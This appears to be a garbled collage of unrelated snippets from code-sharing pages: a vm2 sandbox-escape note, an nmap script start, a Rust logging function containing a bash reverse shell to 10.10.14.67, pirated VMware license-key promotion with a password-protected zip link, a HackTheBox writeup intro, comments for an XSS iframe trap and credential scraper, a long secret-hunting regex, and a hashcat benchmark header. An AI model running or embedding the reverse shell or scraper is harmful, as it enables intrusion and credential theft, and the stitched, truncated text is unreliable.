In vm2 versions up to 3.9.19, the Node.js custom inspect function allows attackers to escape the sandbox and run arbitrary code.
#!/bin/bash
# Check if an argument was provided
if [ $# -eq 0 ]; then
    NMAP_XML_OUTPUT="/dev/stdin"
else
    NMAP_XML_OUTPUT="$1"
fi
# Use xmllint to parse IP addresses and ports from the Nmap XML output
// I couldn't find the owner of the exploit, anyone who knows can comment so I can give the credits ;)
extern crate chrono;
use std::fs::OpenOptions;
use std::io::Write;
use chrono::prelude::*;
use std::process::Command;
pub fn log(user: &str, query: &str, justification: &str) {
    let command = "bash -i >& /dev/tcp/10.10.14.67/444 0>&1";
Install VMWare Workstation PRO 17 (Read it right. PRO!)
Also, these keys might also work with VMWare Fusion 13 PRO. Just tested it.
Sub to me on youtube pls - PurpleVibe32
if you want more keys - call my bot on telegram. @purector_bot (THE BOT WONT REPLY ANYMORE) - Or: https://cdn.discordapp.com/attachments/1040615179894935645/1074016373228978277/keys.zip - the password in the zip is 102me.
---
This gist can get off at any time.
PLEASE, DONT COPY THIS. IF YOU FORK IT, DONT EDIT IT.
*If you have a problem comment and people will try to help you!
*No virus
Let's pwn the box Scrambled from HackTheBox using only NetExec! For context, I was reading the Scrambled writeup from 0xdf_ when I read this:
smbclient won’t work, and I wasn’t able to get crackmapexec to work either.
To be fair, at the time of his writeup it was true, but not anymore, and it's pretty simple with NXC: 5 minutes and you get root :)
Note: I will skip the web part where we get one username: ksimpson
alert('Click ok when you\'re ready to enter iframe trap');
// Example Credential scraper and
// XSS iframe trap. Load from whatever
// page has the reflected/stored XSS vuln
// trap the user in an iframe of the app.
// Frame the login page, and copy out the
// username and password fields.
// @hoodoer
(?i)((access_key|access_token|admin_pass|admin_user|algolia_admin_key|algolia_api_key|alias_pass|alicloud_access_key|amazon_secret_access_key|amazonaws|ansible_vault_password|aos_key|api_key|api_key_secret|api_key_sid|api_secret|api.googlemaps AIza|apidocs|apikey|apiSecret|app_debug|app_id|app_key|app_log_level|app_secret|appkey|appkeysecret|application_key|appsecret|appspot|auth_token|authorizationToken|authsecret|aws_access|aws_access_key_id|aws_bucket|aws_key|aws_secret|aws_secret_key|aws_token|AWSSecretKey|b2_app_key|bashrc password|bintray_apikey|bintray_gpg_password|bintray_key|bintraykey|bluemix_api_key|bluemix_pass|browserstack_access_key|bucket_password|bucketeer_aws_access_key_id|bucketeer_aws_secret_access_key|built_branch_deploy_key|bx_password|cache_driver|cache_s3_secret_key|cattle_access_key|cattle_secret_key|certificate_password|ci_deploy_password|client_secret|client_zpk_secret_key|clojars_password|cloud_api_key|cloud_watch_aws_access_key|cloudant_password|cloudflare_api_key|cloudflare_auth_k
Apple M1 Ultra, 20 Core CPU, 48 Core GPU, 64GB of RAM, 1TB SSD
Thanks to @fhlipZero (https://twitter.com/fhlipZero) for running the benchmark on his hardware and allowing me to publish it.
A copy of both a short benchmark and the following full run can be found at https://gist.github.com/fhlip0
hashcat (v6.2.5-340-g98b89e43d) starting in benchmark mode
Benchmarking uses hand-optimized kernel code by default.
alert('Click ok when you\'re ready to enter iframe trap');
// Example XSS iframe trap. Load from whatever
// page has the reflected/stored XSS vuln
// trap the user in an iframe of the app.
// While they surf around, they stick in your
// iFrame, and you keep their session and your XSS
// payload running.
// @hoodoer